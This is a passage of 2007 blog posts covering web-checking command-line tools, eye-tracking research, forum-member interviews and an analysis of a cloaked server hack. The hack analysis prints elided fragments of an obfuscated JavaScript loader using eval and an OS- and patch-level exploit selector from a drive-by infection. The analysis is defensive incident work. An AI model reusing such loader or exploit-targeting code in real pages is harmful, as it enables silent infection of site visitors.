A set of command-line Windows website tools

Comments Off on A set of command-line Windows website tools

If you have to do things over and over again, it’s a good idea to use a tool to make things easier. Windows is a bit limited (or very – when compared to Linux) when it comes to batch file scripts and “wget” is limited to what it can do right out the box, so I sat down and wrote a few command line tools to help me with some of the website checks that I like to do.

The tools I included in this set can do the following:

  • Check the result codes for a URL (and follow in the case of a redirect) – or for a list of URLs
  • Create a list of the links found on a URL (or just particular ones)
  • Create a list of the links and anchor texts found on a URL (or just particular ones)
  • Create a simple keyword analysis of the indexable content on a URL

You can get the down from here (requires the Windows .NET runtime v1.1):


This tool accesses a URL and shows the result code that was returned. If the status is a redirect, it will display the redirection location and optionally follow it to check the final result code. It may be used with a list of URLs. The output is tab-delimited.

WebResult [options] (URL|urllist.txt)
–referer|-r [referrer] (default: none)
–user-agent|-u [user-agent] (default: “WebResult”)
–follow-redirect|-f (default: not)
–headers|-h (displays the full response headers)

Check for correct canonical redirect:
Webresult http://johnmu.com/
Webresult http://www.johnmu.com/


This tool lists the links that are found on a URL. Note that it has an integrated HTML/XHTML parser – if the code on the page is not fully compliant, there is a chance of the parser not recognizing all links (it is fairly fail-safe, though).

This tool can use a cached version of the URL (from either this tool or one of the other ones) to save bandwidth. The cached versions are saved in the user’s temp-folder.

You have the choice of only listing domain outbound or insite links (to help simplify the output). Additionally links with the HTML microformat “rel=nofollow” may be marked as such. The output is in alphabetical order.

WebLinks [options] (URL|urllist.txt)
–referer [referrer] (default: none)
–user-agent [user-agent] (default: “WebLinks”
–insite-only|-i (default: both in + out)
–outbound-only|-o (default: both in + out)
–ignore-nofollow|-n (default: off)
–cache|-c (default: off)
–verbose|-v (default: off)

Check the outbound links on a site.
WebLinks -o http://johnmu.com/


This tool lists the links and anchor text as found on a URL. It uses the same HTML/XHTML parser as WebLinks. It can be used to find certain links (based on the URL, domain name, URL-snippets, or even parts of the anchor text). If the anchor for a link is an image, it will use the appropriate ALT-text, etc.

WebAnchors [options] (URL|urllist.txt)
–referer|-r [referrer] (default: none)
–user-agent|-u [user-agent] (default: “WebLinks”
–find-url|-f http://URL
–find-domain|-d DOMAIN.TLD
–find-anchor|-a TEXT
–find-url-snippet|-s TEXT
–url-only|-o (default: show anchor text as well)
–skip-nofollow|-n (default: off)
–cache|-c (default: off)
–verbose|-v (default: off)

Check the links with “Google” in the anchor text.
WebAnchors -s “Google” http://johnmu.com/


This tool does a simple keyword analysis on the indexable content of a URL. It also uses the above HTML/XHTML parser to extract the indexable text. It is possible to get single-word keywords or to use multi-word-phrases. The output is tab-delimited for re-use.

WebKeywords [options] (URL|urllist.txt)
–referer|-r [referrer] (default: none)
–user-agent|-u [user-agent] (default: “WebLinks”
–verbose|-v (default: off)
–words|-w [NUM] (phrases with number of words, default: 1)
–ignore-numbers|-n (default: off)
–cache|-c (cache web page, default: off)

Extract 3-word keyphrases from a page:
Webkeywords -w 3 http://johnmu.com/

Combined usage of these tools

Find common keyphrases on sites linked from a page (uses a temporary file to store the URLs):

webanchors -c -o -a “Google” http://johnmu.com >temp.txt
webkeywords -c -w 3 temp.txt

Check result codes of all URLs linked from a page:

weblinks -c http://johnmu.com >temp.txt
webresult temp.txt >links.tsv

Compare result codes for multiple accesses:

echo. >results.tsv
for /L %i IN (1,1,100) DO webresult http://johnmu.com/ >>results.tsv

or more complicated to test a hack based on the referrer (all on one line):

for /L %i IN (1,1,100) DO webresult -u “Mozilla/5.0 (Windows; U) Gecko/20070725 Firefox/” -r http://www.google.com/search?q=johnmu http://johnmu.com/ >>results.tsv

I’d love to hear about your usage of these tools :) .

Copyright © 2010 johnmu.com. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact johnmu.com so we can take legal action immediately.
Plugin by Taragana

August 31st 2007 News

But What Does It All Mean? Understanding Eye-Tracking Results (Part 2)

Comments Off on But What Does It All Mean? Understanding Eye-Tracking Results (Part 2)

Part II:  What can you learn from eye-tracking data?

People often ask me what exactly they can learn from eye tracking.  I have a short version answer which is:

We track:

•    Where people look
•    Where people click
•    What people ignore
•    And we discover why they decide to click …or not click.

Why does it work?

•    Your eyes are
hardwired into your brain and the eyes cannot lie.
•    Eyes can’t be "put down" like a mouse between clicks.
•    Eyes + clicks + subjective questions give a comprehensive view into the user experience.

This explanation is pretty common, but in reality, you can gain much more insight into the user experience from these kinds of studies.  Some advantages of eye tracking studies include:


•    Biometric measurements are more accurate than user feedback.  User feedback is invaluable, but notoriously unreliable.  Feedback regarding feelings, opinions, etc. must be acquired through survey methods.  However, measuring natural behavior gives a much more accurate picture of a user’s immediate experience than asking them after the task is complete.

•    Eye-tracking data can be used to accurately predict user feedback. This is true for questions regarding ease of use, ease of navigation, etc. All of these items also affect user confidence in the site and company.

•    Site navigation patterns can be mapped.  For instance, we can map out common navigation paths from a homepage to an interior page, and can begin to understand why some are being used more than others.

•    Results are representative of a “natural work environment”.  In other words, eye tracking does not require that a moderator be in the room with the user. Obviously the studies are done in a controlled environment, but not having other people in the room makes the experience very comfortable for users.

•    Viewing order of pages and page elements can be established.  We begin to understand what information is most likely to be seen/missed by users, and in what order.  For example, are users viewing a “Free Trial” offer 1st or 15th when seeing the page? Now you can know.

•    DHTML elements can be tracked separately.  The visual effectiveness and frequency of use of DHTML elements can be studied.

•    Short iterative testing can also be implemented. Because we can test prototypes (yes, even jpeg mock-ups), short eye tracking tests can be used to modify designs quickly.  This kind of testing is not a standard use of eye-tracking, but is proving to be very effective.

•    Page element placement, copy, etc effects can be ranked.  Should I change my header text? Move a menu to the right rail? Change the icon size or background? Certain layout changes can be ranked as to how much effect they will have on viewing patterns.

One point to keep in mind is that eye-tracking, like all other usability tests, is not going to provide all of the answers by itself.  Eye-tracking is a valuable and powerful tool when implemented alone.   But if you want the best over all picture, use it in conjunction with other usability tests, and as a part of an iterative process.

Does eye tracking measure visual attention?

Yes, eye tracking can estimate the areas of an interface which receive visual attention.  The “bouncing around” of the eye trace shown in the video is created by a series of fast eye movements called saccades.  When your brain is planning an eye movement, it shifts covert attention to the eye’s destination [
1].  The attentional shift and saccade movement have been shown to be inseparable [
].  And, of course, once you fixate something, your visual system starts processing the image.

Does this mean that we remember 100% of everything we fixated on a screen? Definitely not.  Our brains can suppress images, or use the visual signal to inform any number of low level cognitive functions. Does it mean that what we fixated has had an opportunity to directly affect our experience with an interface? Absolutely.

Gaze trace information helps us to understand the areas of a page which most helped to form a user’s visual experience with the site or email.


Here’s an EXELLENT introduction to eye tracking and usability:
Matteo Penzo’s Introduction to Eyetracking: Seeing Through Your Users’ Eyes

[1]   Shipp S. (2004) The brain circuitry of attention. Trends Cogn Sci. 8, 223-30.
[2]   Peterson MS, Kramer AF, Irwin DE. (2004) Covert shifts of attention precede involuntary eye movements. Percept Psychophys. 66, 398-405.
[ref]   Liversedge SP, Findlay JM. (2000) Saccadic eye movements and cognition. Trends Cogn Sci. 4, 6-14.

August 31st 2007 Uncategorized

But What Does It All Mean? Understanding Eye-Tracking Results (Part 1)

Comments Off on But What Does It All Mean? Understanding Eye-Tracking Results (Part 1)

Part I:  Misinterpreting the data

In 2000, the Poynter Institute released their first study analyzing how users view online news websites. Yet, 7 years after eye-tracking made this first major impression on the usability and marketing industries, there still seems to be a lot of confusion over what eye-tracking data can actually tell you about how users interact with your site.

Vague descriptions of methodologies and misinterpretation of eye-tracking data has lead to skepticism about the validity of eye-tracking in usability and marketing research.

Getting answers to common questions

In this next series of blog entries, I thought I’d take a shot at dispelling some small fraction of the confusion surrounding eye-tracking research.  Over the next few weeks I’ll address some recurring questions I get about our research, and the optimal use of eye-tracking studies.Eyetools_poster

Questions like:

•    What is a heatmap… really?
•    How to read a scan path… and what is a scan path?
•    How do you get the most out of eye-tracking analysis? (What many commercial software packages won’t tell you)
•    Basic eye movement terminology and why is it important when interpreting results?

Bad web design is not a good thing.

Just to start us off, I thought I’d share one of my favorite misinterpretations of eye-tracking data.  This originally appeared in a blog entry last year:

I think web surfing is a hunting activity. The eye is looking for anamolies, for things that don’t belong. (That might be why the word anomaly, spelled wrong in the previous sentence, got your focus). […] One of the takeaways is that bad web design might actually be a good thing! Slightly bad design isn’t familiar. It’s off. It demands attention. (Very bad design demands the ‘back’ button, of course).

I have a love/hate relationship with Seth Godin’s article. I love it because it is a perfect cautionary tale about why we should take the time to stop and understand data.  Quick assumptions (especially based on eye-movement recordings) can lead to some surprising conclusions.  This erroneous interpretation has gotten quite a bit of attention, and has even been mentioned in meetings I’ve had with several designers.

So just a few notes to get us started:

•    Bad web design does not encourage viewer attention. It discourages the user from making an effort to understand web content, and only succeeds in getting users lost and frustrated. 

•    Novel interface design does change looking patterns.  However, as long as a website or email is well designed and intuitive, users will learn to navigate it quickly. 

•    Individual search patterns should almost never be considered alone. The video is interesting and fun to watch, but cannot by itself give useful information about how a broad range of people view the site.

•    Individual gaze plot data is always noisy.  This is because we normally move our eye 3 times a second.  A group of gaze plots must be examined to find patterns in page viewing.

Useful References:

Poynter Studies

2005 Enquiro, Eyetools, Did-It Study — Google

August 29th 2007 Uncategorized

Interview with Craig “cass-hacks”

Comments Off on Interview with Craig “cass-hacks”

Hi Craig, welcome to my blog :-) ! Craig is, for those that haven’t noticed, an alien from some solar system far away. At least that’s the conclusion I came to after reading his introduction, the overview page on his site and his “my first computer” posts. I’m pretty sure that he’s either alien or very, very creative (as in creative writing), I mean seriously, “I built my own computer when I was 12.“?! Craig has been a frequent contributor in the Google Groups, bringing in a lot of background knowledge, helping with stylesheets, javascript and all sorts of other issues that arrive on a regular schedule.

I know that wasn’t a question but I would like to comment anyway. Although you are not the first to suggest I am not of this world, serious or not, I feel it is not so much a question of identifying the “where”, but identifying the “when”.

I think had I lived 150 to 200 years ago, I wouldn’t seem as much an alien as I do to so many people. More often than not, people who I communicate with over a period of time before ever meeting in person say something similar, I seem odd to them because they try to identify me with a place and fail but after meeting me in person, understand it is not a matter of identifying a place, but a place in time.

Many people are still put off after realizing that but a few people are able to take it in stride. You can tell a lot about a person by how they react to extreme situations and I guess I can be a bit extreme at times. :-)

Someone once called me an “anachronistic anomaly”. That seems to describe me as well as any other description I have heard, at least descriptions appropriate for mixed company. ;-)

So Craig, with a brain the size of a planet, I’m sure you have some really smart and cool things to do. What drives you to spend so much time in the Google webmaster help groups?

Good question, as in the best question have no real answers. ;-) The closest I think I can come to a real answer though is that I enjoy observing how things work. One of my first memories is of my parents taking me and my two sisters to a zoo where there was a carousel. While my sisters were busy watching the pretty horses, which were just carved and painted wood, I was watching the gears and shafts and cams and wheels looking to see how it all worked.

Later, much later, when I was working with particle accelerators, some the size of 5 story buildings, there would be some sort of problem but one had to have a pretty good idea of what it was because as often seemed the case and as Murphy’s Law would have it, problems usually occurred in the least accessible spot and it could take up to a couple of days just to get to where the problem might be.

If the problem wasn’t there, all that time was wasted. But, it also wasn’t good enough just to know where the problem was, one also had to have an idea of how to fix it and maybe more importantly, how to keep it from happening again and again. All of what went into getting proficient at that was observing what one could of available data from what one could see and then coming up with a reasonable scenario as to what the cause might be where one couldn’t see and then testing that scenario as much as possible before putting any plan into action.

In Google’s Webmaster Tools Help Group, I am able to observe a lot of different situations and the more I see of a given situation, the more I have to go on to try to come up with possible scenarios to understand what may be happening. So I guess what drives me is what has always driven me, a desire to observe and understand.

How did you find the Google Webmaster Help groups in the first place? Looking at your first posts it doesn’t look like you had any particular problem that needed to be solved.

I found the group through the Google Webmaster Tools which I found through the “Add URL” page. I had just launched my first publicly accessible web site and had heard of submitting URLs to the various search engines so I asked “Professor Google” how to do it for the search engines I knew about the most and found what I was looking for. From there, I played with the Webmaster Tools for a very short time which was primarily due to there being no real data to look at when a site is first indexed and then started digging into the help files and was directed to the Groups forum. It was not so much that I was having any particular problem at the time, or since, but more so, someone felt it worthwhile to publish all that information for some reason, not reading it would seem to be a serious waste of both their time and mine.

You are right though, I didn’t have any particular problem nor do I think I would have asked had I one. I have been around long enough on various technical forums and the like to know that there is rarely a question that hasn’t been answered or doesn’t have an answer somewhere although very possibly being “hidden” and in need of being dug for.

On the other hand, I also know that for some questions, there are no answers or at least no answers likely to be forthcoming so before asking too much, I’d want to know what questions are even likely to receive an answer of any use.

But, search engines at that time I had very little experience with, other than as a search user and having already dealt with large amounts of data, it intrigued me as to how one might deal with essentially archiving the entire Internet and more importantly, making that archive available in an intelligent and useful manner. Large amounts of data don’t impress me as I’ve dealt with huge databases of tera and peta-record size but the easy, intelligent and fast access to the contained data is the real challenge.

What was it that grabbed your attention about the web? Why did you decide to put together your own website?

I wouldn’t say I was particularly “grabbed” by the web. It just seemed like a much easier platform to develop applications for. I’ve written in almost every language from machine code to C++ and at one time burning EEPROMs just to be able to test a section of code out. With PHP, Javascript and MySQL, I can whip up an application in a matter of hours. It may and very likely will look like hell but the basic functionality is there, sort of a proof of concept if you will.

As for cass-hacks specifically though, I’d built a lot of toys of various levels of usefulness over a period of time and although any one specific toy may not be all that useful, the processes that go into making them work is always useful because a given toy’s functionality is limited to what it was designed to do as well as a little bit being extensible for other purposes if designed well but the processes that go into making any toy work can be used over and over again to build whatever one can imagine. Also, every language has a lot of very simple syntax that is pretty boring to look at but can become interesting to the point of being exciting when combined in ways one might not originally have thought of.

Although straying a bit from the mark, I think the most interesting project I have documented on my site so far is one that gets the least amount of traffic. That project is a user notification system that is actually “agent” based, i.e. artificial life or as is commonly referred to as artificial intelligence, AI. Many people think that “AI” is some complex rule processor that attempts to simulate intelligent thought but that is only science fiction and pretty much had been given up on many years ago. Most of the work done in this area over the past couple of decades has been “Agent based”, creating simple little entities programmed to do very simple tasks and then releasing them to do what they were programmed to do. Where this ties in with what I have been talking about though is that once I came up with the method of implementing the functionality I wanted to support, it took me all of about 20 minutes to do it using DOM, CSS and Javascript whereas trying to do the same thing in just about any other programming environment would have taken days.

Once you have worked with different technologies, you usually get a grasp for the general problems that could come up when implementing them. What unexpected difficulties did you run into while working on your first site(s)?

This is going to be a boring answer. :-( ) None.

I guess from my past experience, I do things a little different than many people. I start out with a list of requirements for a given task and then look into the various methods of satisfying the requirements, with all their possible positives and minuses and then choose the available “tools” that allow me to do the most with the least. By the time I actually get to building something, it is sort of boring because then it is most often just a matter of “plugging and chugging”, a phrase I got from a Calculus professor in the past which basically means, set up the equations, plug in the variable data and then chug through the calculations. Once you got to the “Plug and Chug” stage, it was all pretty much done.

If you came to a situation where you absolutely had to get a website to rank high for competitive terms, which methods would you apply first?

Probably the first thing I would do is go out and hire an SEO. :-) Sorry, boring answer. OK, first, I’d have some limitations on whether or not I even attempted it in the first place. I’d have to be interested in and/or have some experience in the subject matter because getting different sites to rank well is not the same for all sites. Second, I’d take a look at what the past experience of the site has been and how it is doing currently and then I’d look at what are the short term and long term goals. I guess what all that means is that getting a website to rank high for competitive terms only, is a waste of time, energy and money.

But, if I didn’t care about all that and had someone else’s money to waste, I’d first make sure the site/page was even capable of ranking for the terms in the first place by making sure the terms even existed on any of the pages. Then I’d make sure there was as much information from as many different directions as possible on the subject of the target terms and then I’d work to get enough links to the site as necessary so as to make sure the page(s) was(were) even available for searches in the first place.

What I can’t do though is make people search for the targeted terms. So many people talk about wanting to rank well for this that and the other thing but so often is the case, no one is really searching for what is being targeted. I know some people use keyword generators to find out what people are searching for but I also feel that people who then decide what content to put on their site based solely on what will gain the most traffic are doing a disservice to both themselves as well as their potential visitors.

You seem to have seen a lot of corporate environments and worked in a lot of groups, is there anything about Google that was completely unexpected to you?

I feel another boring answer coming on. No, not really. Google, like all companies, is made up of people. Companies may have their policies but it is people that put them into action. A company could have the most negative policies in the world but due to the people in its employ, the company is seen in a much more positive light than a company that may have the most altruistic policies in the world with assholes implementing them.

Google seems to be the best of both worlds though, company policies seeming to tend toward ensuring equality for all involved with people implementing them that also seem genuinely concerned about the people they actually serve, the users of their various products and services. Were it not the case, I wouldn’t be sticking around because it wouldn’t make sense supporting someone else in being an asshole when I can enjoy being a much bigger one all by myself, why share? On the other hand, when I see a situation, much like with Google, where many people feel the need to view Google as evil or have ulterior motives where having any would be counterproductive, if I can in any way help someone to possibly see the other side of things, I feel I have done some good.

Were it not the case of Google being a basically positive company with obviously positive people working for it, there wouldn’t be so many of them out there putting themselves in the public eye and speaking as much for themselves as they do in efforts to try to explain as much as they can about the company they work for and with.

Turning the tables on Google, assume you had full access to everything and all the help that you needed, what would you change?

It wouldn’t really be a matter of “turning the tables” and although I definitely feel another boring answer coming on, I don’t know enough about what goes on internally to want to change anything. How could I know that what I wanted to change wouldn’t actually make things worse unless I knew why what I wanted to change was the way it was in the first place?

On the other hand, were I to have the opportunity, I would like to improve on some things, mainly things that I have been exposed to. I’d love to revamp the Webmaster tools and make them more timely and informative to the extent possible. Getting rid of tools that are of little use while expanding on others that may seem of little use but could be much more valuable if the data they offered was expanded and made more accessible to searching through. Also, I’d love to rewrite the Google Groups application as it seems to have the worst of all possible worlds.

Its use of Javascript, has to be about the most counterproductive as I have ever seen. There are also a number of things that could be done using Javascript, but aren’t currently, that could make the Groups much easier to use. About the only thing the Groups application has gotten right, in my opinion, is making it so that the functions of the Groups application work with Javascript enabled or disabled, which is actually a big accomplishment considering so many of the Javascript applications similar to it don’t work at all without Javascript.

Also, and I don’t know how much can be done in this area as I don’t know how it is currently implemented but one thing I would like to tackle would be improving the reliability of the various functions of the Groups application as it gets downright discouraging to use more often than I would like any application I was responsible for to be.

Is there anything more you’d like to add at the moment?

Other than thanking you for what has been my first interview in a LOOOOONNNNNGGGG time, I can’t think of anything I’d like to add.

Thanks for your time, Craig!

Although I’ve had a feeling this interview was coming, and dreading it, it wasn’t as painful as I thought so I thank you for making the process not too terribly intolerable! :-)

Copyright © 2010 johnmu.com. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact johnmu.com so we can take legal action immediately.
Plugin by Taragana

August 29th 2007 News

The website hack you’d never find

Comments Off on The website hack you’d never find

Warning: do not try the URLs here unless your system is locked down properly. I suggest using a “virual machine” (I use VMware) to test things like this. The hack itself is complicated, the system is simple – skip the complicated part if you’re in a hurry.

It all started with a posting like this:

When I do a google search for [Jonathan Wentworth Associates] the first result is:

Jonathan Wentworth Associates, LTD
Welcome to Jonathan Wentworth Associates, a respected resource for world-class orchestral soloists,
conductors, opera, chamber music, chamber orchestras, …
www.jwentworth.com/ – 19k – Cached – Similar pages – Note this

The: “Jonathan Wentworth Associates, LTD” is highlighted and is a link to the web site. If you place the mouse over the link, it shows http://www.jwentworth.com. However, if you click the link it immeately attempts to download the trojan. My McAfee immediatly blocked it.

Looking at the page in question, it doesn’t appear to be hacked, it doesn’t appear to have any kind of scripts injected, etc. However, using LiveHTTPHeaders with Firefox, while doing the same steps (search, click on the top result) you see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
HTTP/1.x 302 Found

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Location: http://www.jwentworth.com/

Without going through Google, the page is returned right away, just like it should. Search engine crawlers also get it like that. After the step through Google however, the site does a 302 redirect to some IP-Address and then returns to the original site. The average browser won’t see that, but if you’re quick you might spot it in the status-bar. A search engine crawler or any user who knew the address would get there without a redirect and not notice a thing.


That’s something that deserves to be looked at more closely. What’s on that server? How could I be able to see it?

I had seen something similar a few months back which redirected me to an affiliate site the first time I went to that site through a Google referrer (in my case, the gmail.google.com referrer was enough). It would only trigger once per IP-Address. This looks like a similar hack.

When I was able to download the files, I had a nice collection of:

  • an encrypted javascript file that downloaded exploits based on browser and operating system
  • an exploit from free-spy-cam.net
  • an affiliate sales page for an antivirus software. Oh the irony. “We just infected you, buy our antivirus to get clean.” That is, if that software isn’t infected with something else.
  • an affiliate signup link on that page

A search engine crawler will never see these things. A user, coming in from Google, will get redirected and if the IP address is not known, it will trigger a few exploits based on the system the user has and then display an affiliate ad page. The next time the user comes, the redirect will happen but the normal page will be shown.

Spotting the hack on your site

It would be good to know how you could spot a hack like this on your site. In general, you wouldn’t be able to. You can check for this particular hack, but it might not trigger every time … not to mention that there are likely way too many hacks that you would need to check for.

A simple way to check for it would be to use wget to access the page, and check for strange redirects, eg:

>wget –user-agent Firefox –save-headers –referer “http://www.google.com/search?q=duuude” “http://www.jwentworth.com/”

However, as mentioned, that might not work every time.

The technical details

(skip this part, if you are lost already :-) )

The original spotting of the anomaly was using LiveHTTPHeaders with Firefox, while doing the steps: search, click on the top result. You see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates

HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:04 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/
1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/ mod_ssl/
2.8.28 OpenSSL/0.9.7a
(… added space to prevent linking …)

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:05 GMT
Location: http://www.jwentworth.com/

A strange redirect like that is a really bad sign. How can we check the URL that is given to see what they are sending? Apparently it can only be triggered once per IP-address and I had already used that chance earlier. In order to view the initial page, I had to find an IP address that was not yet registered with the remote server (at least that’s my explanation). I used a proxy server from one of the lists online. Using the proxy server and wget, I was able to access the page:

>set http_proxy=

>wget –user-agent “Firefox” –save-headers “”

Connecting to… connected.
Proxy request sent, awaiting response… 200 OK
Length: unspecified [text/html]
20:43:23 (79.20 KB/s) – `ind.htm@src=324&surl=www.jwentworth.com&sport=80&suri=%
2Findex.html.2′ saved [414]

The page that was returned was a normal frameset:


  2. <frameset framespacing=“0” border=“0” rows=“*,1” frameborder=“0”>
  3. <frame name=“m” src=“/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt” scrolling=“no” noresize marginwidth=“0” marginheight=“0”>
  4. <frame name=“b” src=“about:blank” marginwidth=“0” marginheight=“0” scrolling=“auto”>
  5. <noframes><BODY>Frames not supported by your browser.</BODY></noframes>
  6. </frameset><body></body></html>

The second frame was kind of funny, “about:blank”? The first one was a bit more interesting though:
Notice the “trk” parameter.

Accessing that page with Opera within a VMware virtual machine running Windows 2000 (heh, paranoid is good), I was able to access that page. I saved it for analysis (and had Ethereal running on the side just to be sure). I tried to refresh and it returned 404. You could only view the page once.


Looking at the files you see some interesting things:

– an encrypted javascript file
– an exploit from free-spy-cam.net
– an affiliate sales page for the antivirus software
– an affiliate signup link on that page

The ZIP-File contains a full copy of the files as downloaded by the Opera browser. Check the files at your own risk, they contain the full exploit.

The encrypted javascript file looks like this (pulled apart and reformatted; called “__cntr000.htm” in the ZIP file):


  1. <script language=JavaScript>
  2. function dc(sed) {
  3.   l=sed.length;
  4.   var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,56,60,51,15,9,10,13,36 () 52,16);
  5.   soot=sed;
  6.   for(j=Math.ceil(l/b);j>0;j–) {
  7.      r=;
  8.      for(i=Math.min(l,b);i>0;l–,i–) {
  9.        saam=t[soot.charCodeAt(p++)48];
  10.        sttp=saam<<s;w|=sttp;
  11. ()
  12.      dd1=“document”;
  13.      dd2=“write(r)”;
  14.      eval(dd1+“.”+dd2)
  15. ()
  16. dc(“AVbFxuGqAk7s5OpH (…) G2ovPVoP9dATq_”)
  17. </script>

The contents of the file are encrypted with some variation of Base64 encoding. You can decode the javascript by replacing:
document.write(“<xmp>” + r + “</xmp>”);

Doing that will display the full contents of the encrypted data (called “__cntr000-decoded.htm” in the ZIP file).


  1. ()
  2.   var WinOS=Get_Win_Version(IEversion);
  3.   PatchList = clientInformation.appMinorVersion;
  4.   switch (WinOS)
  5.   {
  6.    case “wXPw”:
  7.     XP_SP2_patched=0;
  8.     FullVersion=clientInformation.appMinorVersion;
  9.     PatchList=FullVersion.split(“;”);
  10.     for (var i=0; i <PatchList.length; i++) { if (PatchList[i]==“SP2”) { XP_SP2_patched=1; } }
  11.     if (XP_SP2_patched==1) { ExploitNumber=9; }
  12. ()
  13.     location.href=“cnte-eshdvvw.htm?trk=zszuyhbinthnpzt”;
  14. ()

It is yet another javascript that triggers an exploit based on the operating system (it even test for XP service pack 2) and browser that the user is using. The exploit is also tagged with the “trk” parameter and couldn’t be downloaded separately. You can bet that’s it’s not a picture of your favorite celebrity, however.

Next steps

You could follow these up with:

  • Checking the whois of the payload-server and notifying the hoster (in this case probable fruitless)
  • Checking the sales page, search for the affiliate ID and the setups running and complain to the affiliate networks about this webmaster
  • Mirror a copy of the original server for analysis
  • Obviously move to a different server, perhaps even a different hoster


The hacker had managed to patch the server side code (most likely the Apache server) so that
– search engines see the normal page
– new users from search engines are hacked with several exploits and shown an ad for anti-virus software

Spotting something like this on your own sites is close to impossible. The search engine crawlers would not notice anything.

Recognizing something like this algorithmically on Google’s side would be possible with the Googlebar-data. Assuming all shown URLs are recorded, they could compare the URL clicked in the search results with the URL finally shown on the user’s browser (within the frames). At the same time, the setup could be used to detect almost any kind of cloaking.

Scary stuff.

Copyright © 2010 johnmu.com. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact johnmu.com so we can take legal action immediately.
Plugin by Taragana

August 24th 2007 News

Interview with Matt / “Dockarl”

Comments Off on Interview with Matt / “Dockarl”

Matt at Google Hi “Doc”, it’s cool to have you here! It’s great that the web removes barriers like the physical distance from here in Switzerland to Australia. Matt has been one of the regular contributors to the Google Webmaster Help Groups since January 2007. He has a diverse background: Agriculture and Computers, an interesting mixture, or how he puts it in his profile: “I know about cows and computers” :-) .

Looking at your first posts, I see a desperate webmaster, someone even screaming for “HELP!!!” in the thread titles. How did you find the Google Webmaster Help groups and what made you decide to originally post about your problems there?

Hmm.. how did I find the groups – I think I might have searched “How to contact Google” and came across the webmaster help groups there. I had to – I’d come across a problem that I just couldn’t get an answer to by doing a regular Google search, I knew it was an unusual problem and, like many other webmasters, I figured I might be able to find a real, living, breathing Googler somewhere to talk about the problem.

Did you get a satisfactory answer to your original questions in the groups? What elements were vital to that outcome?

Well, for some reason the answers to that post (it was back in 2006) have been ‘lost in the system’ but I did get a lot of hypotheticals from the regular group members – but nothing that helped, unfortunately.

How that came about is a very long story, but hell, you’ve asked, so I’ll tell you :-) . The person who owned the intellectual property we had been laboring to develop for the last two years had turned nasty – and was annoyed that we used their name on our website (and outranked them for it). My business partner and I were receiving ~20+ calls a day between us from the person. The phone calls started to elevate to the extent that we considered them threatening, and we were forced to call the police.

In the wash-up we just decided that – as a family business – we weren’t prepared to have to explain to my business partners kids (both under 5) why mum was crying and the police were ‘coming for a visit’ on a Saturday morning – so we decided to remove the name in question to stop further stress, even though we had every right to use it.

So I took the quickest path possible, made the changes to the website and asked Google to remove the cache. It had unintended consequences – it totally removed the ‘snippets’ from our website (our listings were title only), and we were left with a huge traffic decline. This, on top of everything else was absolutely crippling to the business. So, by the time I posted here I was getting a bit desperate – and it’s one reason I’m generally patient with people that come to the groups angry.

In the end, unfortunately no one here could give me the answer to the problem – it was out of their control. I hadn’t realized that a cache removal would remain in effect for 6 months. The main element that was vital to my outcome was Vanessa Fox (the beaut person that she is) who saw my post and stepped in and tweaked the system to let my site back in.

You’re a webmaster, you had issues with your site and Google and posted in the groups. If a webmaster came up to you and asked if it would be worthwhile to post about his problems there, what would you tell them? Would it make any difference if the webmaster was new to webmastering?

That’s an easy question. We’ve got a great community of beaut people here – you just don’t spend hours helping people gratis unless you’re passionate about it, so we tend to be universally ‘nice’ to people, especially newbies. I’d say ‘Go ahead, write your question, try to be succinct about it and TRY NOT TO PANIC!’. I’d also make sure that they knew that the people helping would more than likely be knowledgeable volunteers, so make sure you check your frustration at the door :)

What was it that made you stick around in the Google Groups, not only to ask more questions but also to help answer other people’s questions? What makes the Groups special compared to other forums?

Well I think that JLH and yourself made the effort to email me and help with some problems I was having with a hobby site of mine called ‘utheguru’ – that was an awesome gesture and made me feel at home. That kind of thing, along with the occasional guest post by a Googler, is what makes this forum special

In parallel to that, things had degenerated a lot further with our business to the extent that lawyers had become involved, and I had to put my PhD (and hence, income) on hold to spend my time dealing with that. I was looking for a stress release, and I’ve always been the kind of person that finds learning natural, cathartic and relaxing – so I got hooked.

If I’m honest, I also figured it was a way I could work towards another goal of mine – working with Google.

As an undergrad student, I read Page and Brin’s paper, and thought – “wow, that’s a neat idea”. The whole concept of Pagerank and linkages is something that’s really been around in science for hundreds of years. A good scientific paper is one that references other authors widely, and a reputable scientist is one that has papers referenced by many others. The CONCEPT of Pagerank is really nothing new in science – it just took a neat idea by those two fellows to convert the concept into something that could transcend academia and become relevant to that new thing called ‘the Internet’. Google became popular, first, amongst scientists – that’s something I observed and there was certainly alot of buzz about it within that sector of society before it ever became the household name it is now.

I’ve been a Google user ever since, and I’m fascinated by the system itself, how it works, the company, the culture – everything about Google appeals to me.

Further to the reasons Google fascinates me (you didn’t ask but I’m gonna tell you anyway.. haha), before the rather wild ride of backless lingerie began, I’d worked for some time as a Scientist with the Sugar industry (especially on the field / mechanisation side), and one of the major things I worked on there was reward algorithms – trying to use disparate manufacturing measures at the mill end of the system to send ‘quality’ signals to harvester operators. Hmmm.. how do I explain this – well, I’ve gotta go into a little background detail…

